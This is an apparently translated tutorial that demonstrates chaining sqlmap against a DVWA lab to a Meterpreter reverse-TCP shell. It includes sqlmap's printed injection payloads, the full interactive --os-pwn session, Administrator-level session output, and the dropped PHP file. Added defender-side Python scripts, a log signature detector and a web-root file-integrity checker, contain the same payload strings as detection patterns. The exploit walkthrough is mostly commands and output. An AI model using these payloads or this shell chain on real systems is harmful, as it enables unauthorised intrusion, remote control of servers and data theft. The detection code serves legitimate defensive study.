Combining sqlmap with Meterpreter: turning an injection into a returned shell
Published by: smiling  Source: PHP粉丝网  Added: 2018-10-15 09:41:32  Views:  Comments: 0
Set up your own PHP + MySQL platform with DVWA as the target range, and set the SQL injection level to low (convenient for testing).
Enter 1 in the submit box, capture the request with Burp, copy the request data into a cookies.txt file, and drag it into the Kali environment.
root@kali:~# sqlmap -r "/root/cookies.txt"
Output:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-1890' OR 7466=7466#&Submit=Submit
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: id=-6878' OR 1 GROUP BY CONCAT(0x7162626271,(SELECT (CASE WHEN (5403=5403) THEN 1 ELSE 0 END)),0x716b766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: id=' AND (SELECT * FROM (SELECT(SLEEP(5)))Dgpu)#&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=' UNION ALL SELECT NULL,CONCAT(0x7162626271,0x4c4266596d5953594265,0x716b766271)#&Submit=Submit
---
[13:45:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[13:45:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.8'
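The four techniques sqlmap reports above (boolean-based, error-based, time-based and UNION) each leave a recognisable shape in the web server's access log. As an added defender-side example, not code from the original article, the following script flags those shapes in constructed Apache-style log lines. The log lines are made up for this example and reuse the payload forms printed above; the regular expressions are assumptions about what similar traffic looks like, not a complete signature set.

```python
"""Flag the sqlmap injection techniques shown in the write-up in web access logs.

Added example, not from the original article. The sample log lines are
constructed; the regexes only encode the payload shapes sqlmap printed above.
"""
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# One pattern per technique sqlmap reported, applied to the URL-decoded request.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bOR\s+\d+\s*=\s*\d+", re.I),
    "error-based":         re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based blind":    re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "UNION query":         re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}

# Request line inside a combined-format log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/[\d.]+"')


def classify(line: str) -> list[str]:
    """Return the names of the techniques whose signature appears in one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = unquote_plus(m.group("target"))
    # Decode a second time: double-encoded payloads would otherwise slip past.
    target = unquote_plus(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(target)]


def scan(lines):
    """Yield (source_ip, techniques) for every line matching at least one signature."""
    for line in lines:
        hits = classify(line)
        if hits:
            yield line.split(" ", 1)[0], hits


# Constructed sample log (not from the article). The query strings reuse the
# payload shapes sqlmap printed above, URL-encoded the way a client sends them.
SAMPLE_LOG = [
    '192.168.1.104 - - [17/Jan/2016:13:45:01 +0800] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321',
    '192.168.1.104 - - [17/Jan/2016:13:45:02 +0800] "GET /dvwa/vulnerabilities/sqli/?id=-1890%27%20OR%207466%3D7466%23&Submit=Submit HTTP/1.1" 200 4410',
    '192.168.1.104 - - [17/Jan/2016:13:45:03 +0800] "GET /dvwa/vulnerabilities/sqli/?id=-6878%27%20OR%201%20GROUP%20BY%20CONCAT%280x71%2CFLOOR%28RAND%280%29*2%29%29%20HAVING%20MIN%280%29%23&Submit=Submit HTTP/1.1" 200 4500',
    '192.168.1.104 - - [17/Jan/2016:13:45:09 +0800] "GET /dvwa/vulnerabilities/sqli/?id=%27%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%285%29%29%29Dgpu%29%23&Submit=Submit HTTP/1.1" 200 4300',
    '192.168.1.104 - - [17/Jan/2016:13:45:10 +0800] "GET /dvwa/vulnerabilities/sqli/?id=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x71%2C0x4c%2C0x71%29%23&Submit=Submit HTTP/1.1" 200 4600',
    '10.0.0.5 - - [17/Jan/2016:13:46:00 +0800] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4321',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

A single client hitting the same parameter with all four shapes within seconds, as the sample does, is the pattern worth alerting on; any one match on its own is weaker evidence, and the time-based case is better confirmed by the response time recorded alongside the request.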
After the injection point is confirmed:
root@kali:~# sqlmap -r "/root/cookies.txt" --os-pwn --msf-path=/opt/metasploit
Partially omitted:
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1  (use Metasploit's TCP connection for the shell)
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4  (PHP script)
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2  (custom path)
please provide a comma separate list of absolute directory paths: D:/WWW/DVWA/  (enter the absolute path)
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1  (reverse TCP shell)
what is the local address? [Enter for '192.168.1.104' (detected)]
which local port number do you want to use? [16308]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1  (Meterpreter shell)
Partially omitted:
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 16308
LHOST => 192.168.1.104
[*] Started reverse handler on 192.168.1.104:16308
[*] Starting the payload handler...
[13:46:43] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Sending stage (957487 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.104:16308 -> 192.168.1.8:37639) at 2016-01-17 13:46:45 +0800
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > Computer : PGOS
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32
meterpreter > Server username: PGOS\Administrator
meterpreter >
At the same time, a randomly named PHP upload shell is generated in the DVWA directory.
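The randomly named PHP file left in the web root is the artefact a defender can look for after the fact: a baseline of the script files under the web root, compared against a later snapshot, shows anything that was added or altered. The following is an added example, not code from the original article or from sqlmap; it builds a constructed web root in a temporary directory, takes a baseline, simulates a dropped file and a tampered index, and reports the difference. The file name, file contents and the set of extensions treated as executable scripts are all assumptions made for the example.

```python
"""Detect script files added to or changed under a web root.

Added example, not from the original article. The web root, file names and
contents below are constructed; the extension list is an assumption about
what the web server will execute.
"""
import hashlib
import os
import tempfile

# Assumed set of extensions the web server executes as PHP.
SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5", ".phar"}


def snapshot(root):
    """Map each script file under root (path relative to root) to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff(baseline, current):
    """Return (added, modified, removed) relative paths between two snapshots."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return added, modified, removed


def demo():
    """Build a constructed web root, baseline it, then simulate a dropped file and a tampered index."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "DVWA", "vulnerabilities"))
        with open(os.path.join(root, "DVWA", "index.php"), "w") as fh:
            fh.write("<?php echo 'dvwa'; ?>\n")
        with open(os.path.join(root, "DVWA", "style.css"), "w") as fh:
            fh.write("body{}\n")  # not a script: ignored by snapshot()
        baseline = snapshot(root)

        # Constructed stand-in for a randomly named file appearing later. The
        # name and content are placeholders chosen for this example only.
        with open(os.path.join(root, "DVWA", "tmpuabcd.php"), "w") as fh:
            fh.write("<?php /* placeholder */ ?>\n")
        # An existing script whose content changes is reported as modified.
        with open(os.path.join(root, "DVWA", "index.php"), "a") as fh:
            fh.write("// tampered\n")

        return diff(baseline, snapshot(root))


if __name__ == "__main__":
    added, modified, removed = demo()
    print("added:", added)
    print("modified:", modified)
    print("removed:", removed)
```

In practice the baseline is taken from a known-good deployment and stored off the host, and a new PHP file appearing in a directory the application never writes to is the finding to act on; the underlying fix is still to remove the injection (DVWA's low level concatenates the id parameter straight into the query), since the dropped file is only the consequence.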
Tags: SQLMAP Meterpreter